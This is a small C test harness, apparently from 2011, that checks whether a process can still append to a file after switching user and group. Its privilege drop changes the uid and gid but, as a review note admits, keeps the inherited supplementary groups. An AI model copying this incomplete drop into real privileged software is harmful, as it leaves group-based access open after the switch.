
15 March 2011

rootme.c <= untested (masih ngantuk coyyyyy)

#include <errno.h>
#include <grp.h>
#include <pwd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

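/*
 * rootme: test harness for observing what a process can still do to a file
 * after it has switched to another user and group.
 *
 * Usage: rootme <user> <group> <file>
 *
 * Steps:
 *   1. reopen stdout on <file> in append mode, using the caller's privileges;
 *   2. switch to <group>, then to <user>;
 *   3. wait while the operator deletes <file> and recreates it as root:root;
 *   4. reopen stdout on <file> again and append one line.
 *
 * Returns (via exit) 0 when the final append was written, 1 on any failure.
 * A failure of step 4 is the expected result when the switch in step 2 took
 * effect and <user> has no write access to the recreated file.
 */
int main(int argc, char *argv[]) {
    if (argc < 4) {
        fprintf(stderr, "%s: <user> <group> <file>\n", argv[0]);
        exit(1);
    }

    /* argc >= 4 guarantees these three are non-NULL. */
    const char *user = argv[1];
    const char *group = argv[2];
    const char *file = argv[3];
    char buf[200];

    /*
     * freopen() either returns the stream it was given or NULL, so its
     * result is only tested, never assigned back: stdout is not required
     * to be a modifiable lvalue.
     */
    if (freopen(file, "a", stdout) == NULL) {
        perror("freopen");
        exit(1);
    }

    /*
     * Group first, user second: once the uid is unprivileged the process
     * may no longer be allowed to change its gid.
     *
     * NOTE(review): only the real/effective gid is changed here. The
     * supplementary groups inherited from the caller stay attached, so
     * group-based access to <file> can survive the switch. A production
     * privilege drop clears them (setgroups()/initgroups()) before setgid().
     */
    struct group *gr = getgrnam(group);
    if (gr == NULL) {
        fprintf(stderr, "no such group %s - aborted\n", group);
        exit(1);
    }
    if (setgid(gr->gr_gid) || setegid(gr->gr_gid)) {
        fprintf(stderr, "setgid: %s - aborted\n", strerror(errno));
        exit(1);
    }

    struct passwd *pw = getpwnam(user);
    if (pw == NULL) {
        fprintf(stderr, "no such user %s - aborted\n", user);
        exit(1);
    }
    /* A failed switch must be fatal: carrying on would keep the old uid. */
    if (setuid(pw->pw_uid) || seteuid(pw->pw_uid)) {
        fprintf(stderr, "setuid: %s - aborted\n", strerror(errno));
        exit(1);
    }

    fprintf(stderr,
            "now go erase the file '%s', recreate it as root:root and press enter\n",
            file);
    if (fgets(buf, sizeof(buf), stdin) == NULL) {
        /* Same as before: carry on without a confirmation, but say so. */
        fprintf(stderr, "stdin closed before confirmation - continuing\n");
    }

    /*
     * Second open, now with the switched identity. On failure the stream
     * is closed and must not be written to, so report and stop here.
     */
    if (freopen(file, "a", stdout) == NULL) {
        perror("freopen");
        exit(1);
    }

    /* Flush explicitly so a rejected write is reported, not lost at exit. */
    if (fprintf(stdout, "jama\n") < 0 || fflush(stdout) == EOF) {
        perror("write");
        exit(1);
    }

    exit(0);
}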
